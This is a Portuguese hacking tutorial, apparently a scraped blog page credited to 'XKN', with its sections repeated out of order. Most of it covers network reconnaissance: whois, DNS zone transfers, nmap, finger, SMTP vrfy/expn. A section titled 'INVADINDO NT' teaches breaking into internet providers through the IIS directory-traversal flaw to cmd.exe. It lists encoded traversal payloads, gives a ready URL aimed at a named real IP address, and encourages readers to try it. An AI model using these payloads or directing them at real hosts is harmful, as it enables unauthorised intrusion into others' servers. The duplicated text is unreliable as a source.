O nmap também tem recursos avançados para realizar varreduras de modo furtivo para que o alvo não detecte está sofrendo uma varredura de portas.
6. Consultas de hora e máscara de sub-rede com ICMP
Varreduras de ping são apenas um dos recursos para obtenção de informações sobre a rede. Um programa chamado icmpquery (http://www.securityfocus.com) é capaz de solicitar a hora do servidor e a máscara de sub-rede baseado em mensagens do protocolo ICMP
icmpquery -t <endereço IP ou nome do alvo>
ou
icmpquery -m <endereço IP ou nome do alvo>
Com a hora é possível determinar em que fuso horário está o servidor, o que pode dar dicas de sua localização física. Com a máscara de sub-rede é possível determinar se há outras sub-redes a serem exploradas.
7 Consultas sobre domínios NT com o comando net e nbtstat
No Windows há uma série de ferramentas que vêm padrão na instalação. O comando net traz uma série de opções que permitem conhecer recursos compartilhados na rede (discos e impressoras, por exemplo), usuários, grupos de trabalho, aplicativos e "banners".
O comando
net view /domain
exibe os domínios de uma rede.
O comando
net view /domain:<nome de um domínio>
apresenta as máquinas sob aquele domínio. Também é possível usar os endereços IP adquiridos na consulta com varreduras de ping vistas anteriormente (com o nmap, por exemplo).
O comando
net view \\<nome de uma máquina>
exibe os recursos compartilhados em uma determinada máquina via NetBIOS.
O comando
nbtstat -A <endereço IP da máquina NT>
Exibe os usuários e grupos conectados a uma determinada máquina via NetBIOS
8. Consulta de "banners" com telnet
Um aplicativo muito útil para ver "banners" (pequenos avisos devolvidos pelos servidores em função de uma ação de tentativa de conexão, por exemplo) é o Telnet.
O Telnet pode ser usado para uma infinidade de serviços, por exemplo para saber o tipo de servidor HTTP usado:
telnet <endereço IP ou nome do domínio> 80
Observe que o número colocado depois do nome do domínio após um espaço é o número da porta do serviço (HTTP normalmente é 80).
A pressionar algumas vezes a tecla enter, o servidor responderá com respostas tais como
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Fri, 03 Nov 2000 17:53:29 GMT
Content-Type: text/html
Content-Length: 87
<html><head><title>Error</title></head><body>The parameter is incorrect. </body></html>Connection closed by foreign host.
ou
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>501 Method Not Implemented</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
to /index.html not supported.<P>
Invalid method in request <P>
<HR>
<ADDRESS>Apache/1.3.12 Server at servidor.dominioalvo.com.br Port 80</ADDRESS>
</BODY></HTML>
Connection closed by foreign host.
Essas informações são usadas pelo invasor potencial para definir o tipo de ataque, já que se sabe agora o tipo de servidor e sua versão (o que pode indicar as possíveis vulnerabildiades
Usando a porta 25 (smtp) para envio de correio, pode-se obter também o tipo de servidor de correio e sua versão.
Os fabricantes normalmente definem como desativar tais banners para que o invasor em potencial tenha o mínimo de informações possíveis sobre sua rede.
9. Consulta de recursos compartilhados em rede UNIX usando showmout
NFS (Network File System) é um protocolo de compartilhamento de disco em redes locais usado por sistemas operacionais tipo UNIX. Caso se tenha detectado que a porta 2049 esteja aberta (indicando a possível presença do serviço NFS ativado) pode-se digitar o comando:
showmount -e <endereço do alvo>
para obter uma resposta tal como mostrado abaixo:
export list for <endereço do alvo>
/pub (everyone)
/var (everyone)
/usr user
Esta informação apresenta os volumes compartilhados e as permissões de acesso.
A característica permissiva inerente do serviço NFS impede que estas informações deixem de ser mostradas. No entanto, o controle de quem acessa a máquina pode ser feito com um firewall bem configurado.
10. Consulta de SNMP com comando snmpwalk
A maioria dos pacotes de sistemas operacionais baseados em UNIX oferecem a ferramenta snmpwalk para controle remoto de configuração de dispositivos via rede usando SNMP.
11. Consulta de informações de usuários e grupos com finger
Finger é uma ferramenta clássica que mostra informações de usuários cadastrados em uma determinada máquina.
Finger pode apresentar informações como as abaixo
finger -l @<endereço IP da máquina alvo>
[endereço IP]
Login: Fulano Name:
Directory: /home/Fulano Shell: /bin/bash
On since Thu Nov 9 20:35 (EDT) on tty1 2 hours 21 minutes idle
No mail.
No Plan.
Este tipo de ataque pode ser usado para aplicar engenharia social, que se vale de habilidades sociais do invasor e da ingenuidade das pessoas para convencê-las a praticar (sem elas saberem) atitudes que comprometam a segurança.
Outros comandos como who, users, rwho, rusers são variantes como o mesmo fim.
O ideal é desabilitar esses serviços ou, melhor ainda, retirar esses programas do sistema operacional.
12. Uso do Telnet para consulta de usuários em servidores de correio eletrônico
Para enviar e-mail usando Telnet é necessário saber o nome do servidor de correio ou seu endereço IP. Normalmente um servidor de correio espera conexões na porta 25.
Portanto se o nome do servidor de correio é, por exemplo, smtp.qualquerdominio.com.br, ou seu endereço IP é 300.200.100.50, então os comandos deverão ser apresentados da seguinte maneira:
telnet smtp.qualquerdominio.com.br 25
ou
telnet 300.200.100.50 25
Quando o servidor responder, dê o seguinte comando
helo smtp.qualquerdominio.com.br
A resposta será algo do tipo terá algumas informações mais a mensagem
Pleased to meet you
Ou algo parecido.
Digite então
mail from: seunome@seudominio
Depois:
rcpt to: nomedodestinatario@dominio-do-destinatario
Por fim:
data
E depois escreva o cabeçalho e o conteúdo da mensagem separados por uma linha em branco
To: Fulano de Tal <nomedodestinatario@dominio-do-destinatario>
From: Cicrano <seunome@seudominio>
Subject: Pagode na casa do gago
Fulano,
Amanhã vamos ter um pagode na casa do gago.
Não se esqueça de levar a caipirinha.
Abraços.
Cicrano.
.
Observe que a mensagem terminou com um ponto sozinho na última linha. É assim que o servidor de correio descobre que a mensagem acabou. Você pode enviar mais uma mensagem usando os comandos acima ou terminar a conexão digitando o comando
quit
Esses comandos podem ser usados para enviar uma mensagem legítima ou SPAMs. O comando vrfy, por exemplo, pode ser usado para confirmar a presença de um usuário específico.
O comando expn pode ser usado para descobrir se há um alias para usuários default como root por exemplo ou usuários reais de listas de distribuição de correio.
Esses comandos podem ser usados para envio de correios forjados para os mais diversos objetivos, desde SPAMs até disseminação de vírus via correio eletrônico.
===========================================
============================================================================================================================================================================
INVADINDO NT
Sem dúvida, é uma emoção muito forte, quando se consegue invadir um Provedor; e isto é grandemente facilitado por eles estarem 24 horas conectado. Isto facilita muito mesmo. Para você invadir um provedor; você tem que conhecer pelo menos uma Linguagem de Programação. (Ex: VB, C++, Pascal etc...)
Bem, para começar, você tem que procurar listar na tela do seu Browser, os diretórios da raiz do provedor que você quer invadir. Veja o exemplo abaixo:
http://200.139.474.172/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c+dir/a+c:\*.*
Agora vou explicar para você do que se trata. Bem, se você digitar isto no seu Browser, você poderá invadir um provedor. No caso acima, eu coloquei só um exemplo. Mas veja abaixo um exemplo de como seria exibido na tela do seu Internet Explorer.
Isto funciona da seguinte maneira:
1º) Você deve digitar o http://
2º) Digite o IP do provedor (Exemplo: 200.139.474.172), se for outra diferente da 80, digite o IP mais a porta (Exemplo: 200.139.474.172:8080). Se for a porta 80, não precisa especificar, pois ela é padrão da Web. Uma Lista de portas, pode ser conseguida em outra seção de nossa Página. Você pode também substituir o IP pelo Site: http://www.provedor.com.br/.
3º) Digite o diretório de permissão da Web (Ex: Script, msadc, wwwroot, Vaixo uma lista de diretórios de permissão da Web: cgi-win, cgiwin, _private, _vti_pvt, _vti_cnf, _vti_bin, bin, cgi-local, cgis, cgi, cgibin, cgilocal, htbin, cfdocs, iissamples, samples, pbserver, rpc, _mem_bin
4º) Digite o método. Veja uma lista abaixo: ..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/
..%255c../..%255c../..%255c../
..%%35c../..%%35c../..%%35c../
..%252f..%252f..%252f..%252f..%252f..%252f..%252f ..
%%35c..%%35c..%%35c..%%35c
...%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63/
..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63/
..%35c..%35c..%35c..%35c..%35c..%35c..%35c..%35c/
5º) Digite a localização do interpretador de Comandos: Exemplo: winnt/system32/cmd.exe?/c+ Observação: Se estivesse na Raiz, bastaria digitar: /cmd.exe?/c+ Observe que após especificar o interpretador de comandos, digitamos o sinal de +, isto é importante, pois no lugar dos espaços em branco você deve colocar o sinal de +.
6º) Por fim vem o comando, semelhante aos comandos do MS-DOS. (Dir, Copy, Type, Del etc.) Veja o exemplo: dir/a+c:\*.* Você quer substituir o dir por outros comandos. Então estude o MS-DOS e veja como utilizá-lo.
Vamos testar !!!!!
Agora muito cuidado, você pode ser rastreado faça o que o quiser e boa sorte!
Digite no seu Internet Explorer o seguinte e tecle Enter...
Observação: Ultimamente foi constatado que este Provedor (200.223.190.67), só está compartilhando arquivos e impressora nos dias de sábado à tarde e domingo, onde se faz necessário o uso de downloads em sua página. Isto significa que ela agora suspeita de Hackers e Crakers. Mesmo assim se desejar dar uma olhadinha, basta digitar o endereço abaixo no seu browser.
http://200.223.190.67/scripts/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5
c/winnt/system32/cmd.exe?/c+dir/a+c:\*.*
By XKN (2006)
_________________
By XKN @ -= ProxysX GrouP =-
1. Obtendo informações iniciais do alvo com navegadores Web
Visita ao site da empresa em busca de:
- Endereços
- Empresas ou entidades relacionadas
- Notas de fusões e aquisições
- Números de telefone
- Nomes e endereços de correio eletrônico para contato.
- Normas de privacidade ou segurança que indicam o tipo de mecanismo de segurança em uso
- Links para outros servidores Web relacionados
Examinar código-fonte de páginas em busca de comentários. Vasculhar listas de discussão em busca de pedidos de ajuda que revelem senhas padrão, configurações de rede etc.
Examinar bancos de dados sofisticados como Miners ou Altavista. Nesses bancos de dados é possível conhecer outros sites associados ao site principal
Examinar banco de dados públicos como sites da Receita, CVM, SEC (americana), sites de notícias econômicas, etc.
2. Obtendo informações do site com whois
Whois Exibe informações sobre:
- Organizacionais
- Domínio
- Rede
- Ponto de contato
Servidores Whois
Europa http://whois.ripe.net
Ásia http://whois.apnic.net
Militar http://whois.nic.mil (EUA)
Governo http://whois.nic.gov (EUA)
Brasil http://whois.registro.br
Cliente Whois, distribuído em qualquer versão de UNIX/Linux, é capaz de
verificar domínios .com,.gov, .org e .edu.
OU diretamente no site http://www.networksolutions.com ou http://www.arin.net
As informações coletadas em pesquisas whois podem trazer informações
relevantes como
- Quem registrou o domínio
- O nome do domínio
- O contato administrativo
- Quando o registro foi atualizado e criado
- Os servidores de nomes
O nome do responsável técnico traz seu telefone, fax, email e endreço, os quais podem ser usados para ataques de engenharia social. Os telefones podem ser usados para discagens de guerra.
Para pesquisas de sites brasileiros, a consulta é a seguinte:
$ whois domínio.com.br@whois.registro.br
Para obter informações sobre o domínio.
Depois executa-se whois sobre o endereço IP do primeiro DNS e se obtém a faixa de endereços IPs atribuídos ao domínio.
$whois 10.10.10.1@whois.registro.br
3. Interrogação de DNS com nslookup e host
O DNS (Domain Name Server) é um serviço para conversão de nomes de domínio, tais como www.dominiodeumaempresaqualquer.com.br e seu endereço IP, exemplo 10.10.10.1, e vice-versa.
O DNS na realidade são sempre, no mínimo, dois computadores (primário mestre, e primário escravo, muitas vezes chamado de primário e secundário). Esses computadores contêm um pequeno banco de dados com informações OFICIAIS sobre seu próprio domínio. A informação se torna oficial porque o endereço IP desses servidores têm de ser registrados na FAPESP, Internic ou outro órgão de registro.
Se alguém deseja informações de conversão (resolução) de nomes para um determinado servidor de um domínio, quer seja ele um servidor web, correio, ftp ou outro, consulta o DNS daquele domínio.
O DNS também armazena na memória RAM do computador as informações relativas a domínios consultados na rede (cache), informações essas obtidas dos DNS oficiais dos domínios consultados.
O servidor DNS secundário contém uma réplica do banco de dados do servidor primário. Quando se altera o banco de dados do primário, há uma transferência dos dados do servidor primário para o servidor secundário. Essa transferência é chamada de transferência de zona.
O problema das transferências de zona é que muitas empresas colocam ali dados sobre suas redes internas. O invasor pode usar o comando nslookup, default em aplicações U*X (Unix/Linux) para executar essas transferências de zona para sua própria máquina.
A solução para esse problema está em definir DNSs separados para a rede interna e a rede externa. Também deve-se barrar qualquer consulta na porta 53 via TCP que venha de fora da rede no firewall, já que as solicitações de transferências de zona são feitas com protocolo TCP e as consultas de nomes, inevitáveis para quem quer se conectar à rede da empresa, são feitas com protocolo UDP.
Usando o comando whois estudado acima, obtém-se o endereço do DNS de um domínio alvo.
Usa-se o comando nslookup da seguinte forma:
nslookup
Este comando abre um prompt interativo indicado pelo sinal ">". Assim, digita-se:
>server 10.10.10.1
>set type=any
> ls -d dominioalvo.com.br.
Observe que o endereço fictício 10.10.10.1 é o endereço do DNS primário do domínio alvo. O comando server serve para definir este servidor como o default, ou seja, aquele de quem vamos solicitar a transferência de zona. O comando set type=any permite obter todos os registros DNS disponíveis. O
comando ls -d domínioalvo.com.br. lista todos os os registros do domínio.
Observe que depois de dominioalvo.com.br há um ponto final.
Outros comandos que realizam o mesmo trabalho são os comandos:
host -l dominioalvo.com.br
ou
host -l -v -t any dominioalvo.com.br
Para descobrir servidores de correio é só digitar:
host dominioalvo.com.br
A importância deste último comando está em que o servidor de correio
normalmente está na mesma rede do firewall da rede interna.
4. Traçando a rota da rede com traceroute/tracert
O comando traceroute (ftp://ftp.ee.lbl.gov/traceroute.tar.Z), tracert no Windows 9X/NT/2K, permite a determinação da rota a partir de uma máquina até seu destino.
A sintaxe padrão é:
traceroute <endereço IP ou nome do destino>
No caso do Windows 9x/NT/2k, esse comando é
tracert <endereço IP ou nome do destino>
O resultado é algo como:
1 a47002.provedor.com.br (10.10.10.2) 160.200 ms 157.133 ms 149.642 ms
2 a01001.sp2.provedor.com.br (10.11.11.1) 149.872 ms 159.742 ms 149.769 ms
3 b13041.provedor.com.br (10.11.12.41) 159.860 ms b13001.provedor.com.br (10.11.12.1) 169.645 ms b13041.provedor.com.br (10.10.10.41) 149.791 ms
4 provedor-A3-3-31-dist04.spo.backbone.net.br (10.10.10.9) 489.654 ms 489.619 ms 480.043 ms
5 provedor-A3-3-31-dist04.spo.backbone.net.br (10.10.10.9) 479.637 ms bb-F1-1-0-acc06.spo.backbone.net.br (10.10.10.73) 499.758 ms 488.718 ms
6 hm31.site-alvo.com.br (10.10.10.101) 489.825 ms 488.736 ms bb-F1-1-0-acc06.spo.backbone.net.br (10.10.10.73) 489.880 ms
O traceroute do Unix/Linux trabalha com pacotes UDP, o tracert trabalha com pacotes ICMP. Para usar pacotes ICMP com traceroute, pode ser usada a opção -I. A porta de conexão do traceroute pode ser escolhida -pela opção -p.
Com este comando é possível tirar conclusões sobre a topologia da rede alvo.
5. Varredura de rede com nmap
Um dos programas mais conhecidos atualmente para levantamento de topologia de rede é o nmap (http://www.insecure.org). Ele permite vasculhar uma rede e identificar todas as máquinas ativas, retornando seus endereços IP. Ele também permite descobrir que portas estão abertas em cada máquina e identificar o sistema operacional. O sistema operacional pode ser identificado devido à natureza aberta das especificações da pilha TCP/IP. Cada implementação da pilha carrega peculiaridades que permitem identificá-la.
Um exemplo de comando nmap para vasculhar a rede é:
# nmap -O -v -v 10.0.0.1-254
Neste caso o nmap vai varrer todas as máquinas com endereços de 10.0.0.1 a 10.0.0.254, identificar que portas estão abertas, seu estado (ouvindo, por exemplo) e apresentar o sistema operacional provável.
O nmap também tem recursos avançados para realizar varreduras de modo furtivo para que o alvo não detecte está sofrendo uma varredura de portas.
6. Consultas de hora e máscara de sub-rede com ICMP
Varreduras de ping são apenas um dos recursos para obtenção de informações sobre a rede. Um programa chamado icmpquery (http://www.securityfocus.com) é capaz de solicitar a hora do servidor e a máscara de sub-rede baseado em mensagens do protocolo ICMP
icmpquery -t <endereço IP ou nome do alvo>
ou
icmpquery -m <endereço IP ou nome do alvo>
Com a hora é possível determinar em que fuso horário está o servidor, o que pode dar dicas de sua localização física. Com a máscara de sub-rede é possível determinar se há outras sub-redes a serem exploradas.
7 Consultas sobre domínios NT com o comando net e nbtstat
No Windows há uma série de ferramentas que vêm padrão na instalação. O comando net traz uma série de opções que permitem conhecer recursos compartilhados na rede (discos e impressoras, por exemplo), usuários, grupos de trabalho, aplicativos e "banners".
O comando
net view /domain
exibe os domínios de uma rede.
O comando
net view /domain:<nome de um domínio>
apresenta as máquinas sob aquele domínio. Também é possível usar os endereços IP adquiridos na consulta com varreduras de ping vistas anteriormente (com o nmap, por exemplo).
O comando
net view \\<nome de uma máquina>
exibe os recursos compartilhados em uma determinada máquina via NetBIOS.
O comando
nbtstat -A <endereço IP da máquina NT>
Exibe os usuários e grupos conectados a uma determinada máquina via NetBIOS
8. Consulta de "banners" com telnet
Um aplicativo muito útil para ver "banners" (pequenos avisos devolvidos pelos servidores em função de uma ação de tentativa de conexão, por exemplo) é o Telnet.
O Telnet pode ser usado para uma infinidade de serviços, por exemplo para saber o tipo de servidor HTTP usado:
telnet <endereço IP ou nome do domínio> 80
Observe que o número colocado depois do nome do domínio após um espaço é o número da porta do serviço (HTTP normalmente é 80).
A pressionar algumas vezes a tecla enter, o servidor responderá com respostas tais como
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Fri, 03 Nov 2000 17:53:29 GMT
Content-Type: text/html
Content-Length: 87
<html><head><title>Error</title></head><body>The parameter is incorrect. </body></html>Connection closed by foreign host.
ou
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>501 Method Not Implemented</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
to /index.html not supported.<P>
Invalid method in request <P>
<HR>
<ADDRESS>Apache/1.3.12 Server at servidor.dominioalvo.com.br Port 80</ADDRESS>
</BODY></HTML>
Connection closed by foreign host.
Essas informações são usadas pelo invasor potencial para definir o tipo de ataque, já que se sabe agora o tipo de servidor e sua versão (o que pode indicar as possíveis vulnerabildiades
Usando a porta 25 (smtp) para envio de correio, pode-se obter também o tipo de servidor de correio e sua versão.
Os fabricantes normalmente definem como desativar tais banners para que o invasor em potencial tenha o mínimo de informações possíveis sobre sua rede.
9. Consulta de recursos compartilhados em rede UNIX usando showmout
NFS (Network File System) é um protocolo de compartilhamento de disco em redes locais usado por sistemas operacionais tipo UNIX. Caso se tenha detectado que a porta 2049 esteja aberta (indicando a possível presença do serviço NFS ativado) pode-se digitar o comando:
showmount -e <endereço do alvo>
para obter uma resposta tal como mostrado abaixo:
export list for <endereço do alvo>
/pub (everyone)
/var (everyone)
/usr user
Esta informação apresenta os volumes compartilhados e as permissões de acesso.
A característica permissiva inerente do serviço NFS impede que estas informações deixem de ser mostradas. No entanto, o controle de quem acessa a máquina pode ser feito com um firewall bem configurado.
10. Consulta de SNMP com comando snmpwalk
A maioria dos pacotes de sistemas operacionais baseados em UNIX oferecem a ferramenta snmpwalk para controle remoto de configuração de dispositivos via rede usando SNMP.
11. Consulta de informações de usuários e grupos com finger
Finger é uma ferramenta clássica que mostra informações de usuários cadastrados em uma determinada máquina.
Finger pode apresentar informações como as abaixo
finger -l @<endereço IP da máquina alvo>
[endereço IP]
Login: Fulano Name:
Directory: /home/Fulano Shell: /bin/bash
On since Thu Nov 9 20:35 (EDT) on tty1 2 hours 21 minutes idle
No mail.
No Plan.
Este tipo de ataque pode ser usado para aplicar engenharia social, que se vale de habilidades sociais do invasor e da ingenuidade das pessoas para convencê-las a praticar (sem elas saberem) atitudes que comprometam a segurança.
Outros comandos como who, users, rwho, rusers são variantes como o mesmo fim.
O ideal é desabilitar esses serviços ou, melhor ainda, retirar esses programas do sistema operacional.
12. Uso do Telnet para consulta de usuários em servidores de correio eletrônico
Para enviar e-mail usando Telnet é necessário saber o nome do servidor de correio ou seu endereço IP. Normalmente um servidor de correio espera conexões na porta 25.
Portanto se o nome do servidor de correio é, por exemplo, smtp.qualquerdominio.com.br, ou seu endereço IP é 300.200.100.50, então os comandos deverão ser apresentados da seguinte maneira:
telnet smtp.qualquerdominio.com.br 25
ou
telnet 300.200.100.50 25
Quando o servidor responder, dê o seguinte comando
helo smtp.qualquerdominio.com.br
A resposta será algo do tipo terá algumas informações mais a mensagem
Pleased to meet you
Ou algo parecido.
Digite então
mail from: seunome@seudominio
Depois:
rcpt to: nomedodestinatario@dominio-do-destinatario
Por fim:
data
E depois escreva o cabeçalho e o conteúdo da mensagem separados por uma linha em branco
To: Fulano de Tal <nomedodestinatario@dominio-do-destinatario>
From: Cicrano <seunome@seudominio>
Subject: Pagode na casa do gago
Fulano,
Amanhã vamos ter um pagode na casa do gago.
Não se esqueça de levar a caipirinha.
Abraços.
Cicrano.
.
Observe que a mensagem terminou com um ponto sozinho na última linha. É assim que o servidor de correio descobre que a mensagem acabou. Você pode enviar mais uma mensagem usando os comandos acima ou terminar a conexão digitando o comando
quit
Esses comandos podem ser usados para enviar uma mensagem legítima ou SPAMs. O comando vrfy, por exemplo, pode ser usado para confirmar a presença de um usuário específico.
O comando expn pode ser usado para descobrir se há um alias para usuários default como root por exemplo ou usuários reais de listas de distribuição de correio.
Esses comandos podem ser usados para envio de correios forjados para os mais diversos objetivos, desde SPAMs até disseminação de vírus via correio eletrônico.
===========================================
============================================================================================================================================================================
INVADINDO NT
Sem dúvida, é uma emoção muito forte, quando se consegue invadir um Provedor; e isto é grandemente facilitado por eles estarem 24 horas conectado. Isto facilita muito mesmo. Para você invadir um provedor; você tem que conhecer pelo menos uma Linguagem de Programação. (Ex: VB, C++, Pascal etc...)
Bem, para começar, você tem que procurar listar na tela do seu Browser, os diretórios da raiz do provedor que você quer invadir. Veja o exemplo abaixo:
http://200.139.474.172/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c+dir/a+c:\*.*
Agora vou explicar para você do que se trata. Bem, se você digitar isto no seu Browser, você poderá invadir um provedor. No caso acima, eu coloquei só um exemplo. Mas veja abaixo um exemplo de como seria exibido na tela do seu Internet Explorer.
Isto funciona da seguinte maneira:
1º) Você deve digitar o http://
2º) Digite o IP do provedor (Exemplo: 200.139.474.172), se for outra diferente da 80, digite o IP mais a porta (Exemplo: 200.139.474.172:8080). Se for a porta 80, não precisa especificar, pois ela é padrão da Web. Uma Lista de portas, pode ser conseguida em outra seção de nossa Página. Você pode também substituir o IP pelo Site: http://www.provedor.com.br/.
3º) Digite o diretório de permissão da Web (Ex: Script, msadc, wwwroot, Vaixo uma lista de diretórios de permissão da Web: cgi-win, cgiwin, _private, _vti_pvt, _vti_cnf, _vti_bin, bin, cgi-local, cgis, cgi, cgibin, cgilocal, htbin, cfdocs, iissamples, samples, pbserver, rpc, _mem_bin
4º) Digite o método. Veja uma lista abaixo: ..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/
..%255c../..%255c../..%255c../
..%%35c../..%%35c../..%%35c../
..%252f..%252f..%252f..%252f..%252f..%252f..%252f ..
%%35c..%%35c..%%35c..%%35c
...%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63/
..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63/
..%35c..%35c..%35c..%35c..%35c..%35c..%35c..%35c/
5º) Digite a localização do interpretador de Comandos: Exemplo: winnt/system32/cmd.exe?/c+ Observação: Se estivesse na Raiz, bastaria digitar: /cmd.exe?/c+ Observe que após especificar o interpretador de comandos, digitamos o sinal de +, isto é importante, pois no lugar dos espaços em branco você deve colocar o sinal de +.
6º) Por fim vem o comando, semelhante aos comandos do MS-DOS. (Dir, Copy, Type, Del etc.) Veja o exemplo: dir/a+c:\*.* Você quer substituir o dir por outros comandos. Então estude o MS-DOS e veja como utilizá-lo.
Vamos testar !!!!!
Agora muito cuidado, você pode ser rastreado faça o que o quiser e boa sorte!
Digite no seu Internet Explorer o seguinte e tecle Enter...
Observação: Ultimamente foi constatado que este Provedor (200.223.190.67), só está compartilhando arquivos e impressora nos dias de sábado à tarde e domingo, onde se faz necessário o uso de downloads em sua página. Isto significa que ela agora suspeita de Hackers e Crakers. Mesmo assim se desejar dar uma olhadinha, basta digitar o endereço abaixo no seu browser.
http://200.223.190.67/scripts/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5
c/winnt/system32/cmd.exe?/c+dir/a+c:\*.*
By XKN (2006)
_________________
By XKN @ -= ProxysX GrouP =-
Assinar:
Postagens (Atom)